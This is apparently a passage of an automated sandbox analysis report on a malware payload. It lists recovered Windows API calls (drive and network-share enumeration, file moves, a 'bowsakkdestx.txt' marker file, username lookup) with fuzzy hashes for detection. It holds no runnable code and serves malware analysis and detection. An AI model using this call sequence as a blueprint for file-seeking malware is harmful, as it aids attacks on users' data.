                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 3697694649-0
                                                                                                  • Opcode ID: 1c9c0b147fd8a7d5bc86f2402148095dee1c5e85c16066dfbca59301024fdc39
                                                                                                  • Instruction ID: 40525bf4541b5265013e80cf0eff2c923ef0bacbcf35a17fcdccaf94117be596
                                                                                                  • Opcode Fuzzy Hash: 1c9c0b147fd8a7d5bc86f2402148095dee1c5e85c16066dfbca59301024fdc39
                                                                                                  • Instruction Fuzzy Hash: B8018432A40319EADB20A7E59C85FEDB76CBB08B44F1440A9F700BB1C0E671A905CBE5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 00E2C51B
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00E2C539
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$AppendFolder
                                                                                                  • String ID: bowsakkdestx.txt
                                                                                                  • API String ID: 29327785-2616962270
                                                                                                  • Opcode ID: 971ec77ddb560e69c540400ce2fb5ac91a1a368940839b83b12ffddae83e5898
                                                                                                  • Instruction ID: 12a1e49c90467a5203eee6cf988363e58780233ecb5eb0911ae9d5247536d234
                                                                                                  • Opcode Fuzzy Hash: 971ec77ddb560e69c540400ce2fb5ac91a1a368940839b83b12ffddae83e5898
                                                                                                  • Instruction Fuzzy Hash: D4113AB2A8032832D93075B97C87FEB738C8B42721F5010A5FF0CB6182E562954611E2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00E3BAAD
                                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00E3BABE
                                                                                                  • UpdateWindow.USER32(00000000), ref: 00E3BAC5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Window$CreateShowUpdate
                                                                                                  • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                                  • API String ID: 2944774295-3503800400
                                                                                                  • Opcode ID: 57c2fb339ea24fad005bb1f35fca67658991f73cd9c22d4145893daf2b1bf944
                                                                                                  • Instruction ID: fe3b6a5e6f3676023ac1280cf96e41523763bd58db1e66ff13b706e85fd59ec2
                                                                                                  • Opcode Fuzzy Hash: 57c2fb339ea24fad005bb1f35fca67658991f73cd9c22d4145893daf2b1bf944
                                                                                                  • Instruction Fuzzy Hash: 50E04F71781B34BBE23197157C4BF973914EB05F20F314049FB107D2D0C6E5A9469A8D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • WNetOpenEnumW.MPR(00000002,00000000,00000000,00000000,?), ref: 00E30C12
                                                                                                  • GlobalAlloc.KERNEL32(00000040,00004000), ref: 00E30C39
                                                                                                  • _memset.LIBCMT ref: 00E30C4C
                                                                                                  • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00E30C63
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 364255426-0
                                                                                                  • Opcode ID: 85109698e7a05c8bdbd81a69691f0a984dfb0639a6f6dec0a1eb658ab9c0c0a6
                                                                                                  • Instruction ID: a476891b9744405cf72a1809300f0933e577534bde3d6e0d6403b34a26d08226
                                                                                                  • Opcode Fuzzy Hash: 85109698e7a05c8bdbd81a69691f0a984dfb0639a6f6dec0a1eb658ab9c0c0a6
                                                                                                  • Instruction Fuzzy Hash: 1491D2756083418FD728DF68C8A9B6BBBE1FF84708F14591DF48AA7281E770A944CB52
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetLogicalDrives.KERNEL32 ref: 00E30A75
                                                                                                  • SetErrorMode.KERNEL32(00000001,00F20234,00000002), ref: 00E30AE2
                                                                                                  • PathFileExistsA.SHLWAPI(?), ref: 00E30AF9
                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00E30B02
                                                                                                  • GetDriveTypeA.KERNEL32(?), ref: 00E30B1B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                                  • String ID:
                                                                                                  • API String ID: 2560635915-0
                                                                                                  • Opcode ID: 2447330bc27ad7f85ea4d821b97128412091a05f2eb739081cb64ef37e469fd0
                                                                                                  • Instruction ID: e60953e260bb8291b1a73104a5c5157cf67ba8ae80a4cef988233a82e1a277c9
                                                                                                  • Opcode Fuzzy Hash: 2447330bc27ad7f85ea4d821b97128412091a05f2eb739081cb64ef37e469fd0
                                                                                                  • Instruction Fuzzy Hash: AF41F0715083809FC710DF68C899B5BBBE4FB84718F501A2CF095A62A2D7B5C608CB93
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 2974526305-0
                                                                                                  • Opcode ID: 9e77ca378067106b382c1612874db5bfe6f7ab6856e5f5fd42cfca243cc5d73c
                                                                                                  • Instruction ID: 4e39c12d5fdce55141a6208dfdebe89fdb1a1896e2b86ee2288ef901a7547d3a
                                                                                                  • Opcode Fuzzy Hash: 9e77ca378067106b382c1612874db5bfe6f7ab6856e5f5fd42cfca243cc5d73c
                                                                                                  • Instruction Fuzzy Hash: 9451F330A017059BCB248FA9A8806AE77B1AF40324F64932DFA35B23E1D7B09D50DB58
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 00E3B1BA
                                                                                                    • Part of subcall function 00E311C0: CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?), ref: 00E3120F
                                                                                                    • Part of subcall function 00E311C0: GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 00E31228
                                                                                                    • Part of subcall function 00E311C0: CloseHandle.KERNEL32(00000000,?,00000000,?), ref: 00E3123D
                                                                                                    • Part of subcall function 00E311C0: MoveFileW.KERNEL32(00000000,?), ref: 00E31277
                                                                                                    • Part of subcall function 00E3BA10: LoadCursorW.USER32(00000000,00007F00), ref: 00E3BA4A
                                                                                                    • Part of subcall function 00E3BA10: RegisterClassExW.USER32(00000030), ref: 00E3BA73
                                                                                                    • Part of subcall function 00E3BA80: CreateWindowExW.USER32(00000000,LPCWSTRszWindowClass,LPCWSTRszTitle,00CF0000,80000000,00000000,80000000,00000000,00000000,00000000,?,00000000), ref: 00E3BAAD
                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E3B4B3
                                                                                                  • TranslateMessage.USER32(?), ref: 00E3B4CD
                                                                                                  • DispatchMessageW.USER32(?), ref: 00E3B4D7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileMessage$Create$ClassCloseCursorDispatchHandleLoadMoveNameRegisterSizeTranslateUserWindow
                                                                                                  • String ID: %username%$I:\5d2860c89d774.jpg
                                                                                                  • API String ID: 441990211-897913220
                                                                                                  • Opcode ID: 8f0085f3831a1e608dff03ff6f88ce50b29d7ecabdff5d924b6b4b49e976ae17
                                                                                                  • Instruction ID: 91f88a2ea9da47a5f2adf078799ea5a316242700c6f51882fb29b5ccfc194a1c
                                                                                                  • Opcode Fuzzy Hash: 8f0085f3831a1e608dff03ff6f88ce50b29d7ecabdff5d924b6b4b49e976ae17
                                                                                                  • Instruction Fuzzy Hash: 045166715142449BC718FB70D85AEEFBBE8BF94340F90582DF58663162EF34A609CB92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __flush__getptd_noexit__lock_file__write
                                                                                                  • String ID:
                                                                                                  • API String ID: 1331135983-0
                                                                                                  • Opcode ID: b40843cbe96d4cbb0adfdf68141c75b49eda0118dbdaae7e02df8827fc528518
                                                                                                  • Instruction ID: f829a56f1aa70ea50c32701e76867b3a62de7a31199846989a2003ce43ba6cd9
                                                                                                  • Opcode Fuzzy Hash: b40843cbe96d4cbb0adfdf68141c75b49eda0118dbdaae7e02df8827fc528518
                                                                                                  • Instruction Fuzzy Hash: 07113A32901F105FD6246BB4BC4276E37909F82734F249759E575BF1C2CF38A6069741
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 00E2EF69
                                                                                                    • Part of subcall function 00E40C62: __FF_MSGBANNER.LIBCMT ref: 00E40C79
                                                                                                    • Part of subcall function 00E40C62: __NMSG_WRITE.LIBCMT ref: 00E40C80
                                                                                                    • Part of subcall function 00E40C62: RtlAllocateHeap.NTDLL(00970000,00000000,00000001,00000000,00000000,00000000,?,00E48CF4,00000000,00000000,00000000,00000000,?,00E48BE1,00000018,00F27BD0), ref: 00E40CA5
                                                                                                  • _malloc.LIBCMT ref: 00E2EF85
                                                                                                  • _memset.LIBCMT ref: 00E2EF9B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _malloc$AllocateHeap_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3655941445-0
                                                                                                  • Opcode ID: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                                                                                                  • Instruction ID: aa4b086e6b3d1c739ac88ce54cb9cde80e72c7446c4383e3a949244d5ad8d64f
                                                                                                  • Opcode Fuzzy Hash: be46dd26feb53539181879275dd2331845889927b108b084fdb43cd894a3e3ad
                                                                                                  • Instruction Fuzzy Hash: F411C631600624EFDB10DFA8D881A5ABBB5FF89310F2455A8E948AF356D731B912CBC1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _malloc.LIBCMT ref: 00E43B64
                                                                                                    • Part of subcall function 00E40C62: __FF_MSGBANNER.LIBCMT ref: 00E40C79
                                                                                                    • Part of subcall function 00E40C62: __NMSG_WRITE.LIBCMT ref: 00E40C80
                                                                                                    • Part of subcall function 00E40C62: RtlAllocateHeap.NTDLL(00970000,00000000,00000001,00000000,00000000,00000000,?,00E48CF4,00000000,00000000,00000000,00000000,?,00E48BE1,00000018,00F27BD0), ref: 00E40CA5
                                                                                                  • std::exception::exception.LIBCMT ref: 00E43B82
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00E43B97
                                                                                                    • Part of subcall function 00E50ECA: RaiseException.KERNEL32(?,?,00E6F26B,?,?,00000000,?,?,?,?,00E6F26B,?,00F281FC,?), ref: 00E50F1F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                                  • String ID:
                                                                                                  • API String ID: 3074076210-0
                                                                                                  • Opcode ID: 6e1416aaea9a8928df36aa99c25d7d9b5015f622eccaa474ec3ecee02b10bc0a
                                                                                                  • Instruction ID: 9615b68063a020f0b747aa1a24bb225209724a37d7662faafb8f5b373c6d785b
                                                                                                  • Opcode Fuzzy Hash: 6e1416aaea9a8928df36aa99c25d7d9b5015f622eccaa474ec3ecee02b10bc0a
                                                                                                  • Instruction Fuzzy Hash: 26F0FF3140021EA6CF00AAA8FC42EDEB7E8EF40315F106866FD14B2282DFB09F4482D1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00E33B0A
                                                                                                    • Part of subcall function 00E43B4C: _malloc.LIBCMT ref: 00E43B64
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc
                                                                                                  • String ID: vector<T> too long
                                                                                                  • API String ID: 657562460-3788999226
                                                                                                  • Opcode ID: 4e59d0bde742fffcd686c43424266add14936e23642ae3a8e001f3b293f5cec7
                                                                                                  • Instruction ID: 4f068e52c98d6b8eabe8a1a4089388c75ad1bb9f07d79606b9e6c46796debbe1
                                                                                                  • Opcode Fuzzy Hash: 4e59d0bde742fffcd686c43424266add14936e23642ae3a8e001f3b293f5cec7
                                                                                                  • Instruction Fuzzy Hash: 9501F772100705ABD720DFACD491B56FBE8EF80764F20863EEA5597741EBB1E954CB80
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 00E74AE0: GetStdHandle.KERNEL32(000000F4,00E74C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,00E7480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,00E71D37,00000000,00E2CDAE,00000001,00000001), ref: 00E74AFA
                                                                                                    • Part of subcall function 00E74AE0: GetFileType.KERNEL32(00000000), ref: 00E74B05
                                                                                                    • Part of subcall function 00E74AE0: __vfwprintf_p.LIBCMT ref: 00E74B27
                                                                                                  • _raise.LIBCMT ref: 00E74C18
                                                                                                    • Part of subcall function 00E4A12E: __getptd_noexit.LIBCMT ref: 00E4A16B
                                                                                                    • Part of subcall function 00E47CEC: _doexit.LIBCMT ref: 00E47CF6
                                                                                                  Strings
                                                                                                  • %s(%d): OpenSSL internal error, assertion failed: %s, xrefs: 00E74C0C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2951410945.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.2951369356.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951524025.0000000000EEC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951589315.0000000000F2A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951631994.0000000000F2C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F3A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951675547.0000000000F49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.2951810198.0000000000F4B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_e20000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileHandleType__getptd_noexit__vfwprintf_p_doexit_raise
                                                                                                  • String ID: %s(%d): OpenSSL internal error, assertion failed: %s
                                                                                                  • API String ID: 2149077303-4210838268
                                                                                                  • Opcode ID: bb6a3c3766e121e2a19f77dc004879e37d6297652d8e517f37a0dba3bfca32aa
                                                                                                  • Instruction ID: 9c929b14c48f6df86412815650592b3bd71356aa430e4edce8116ca4c5d53318
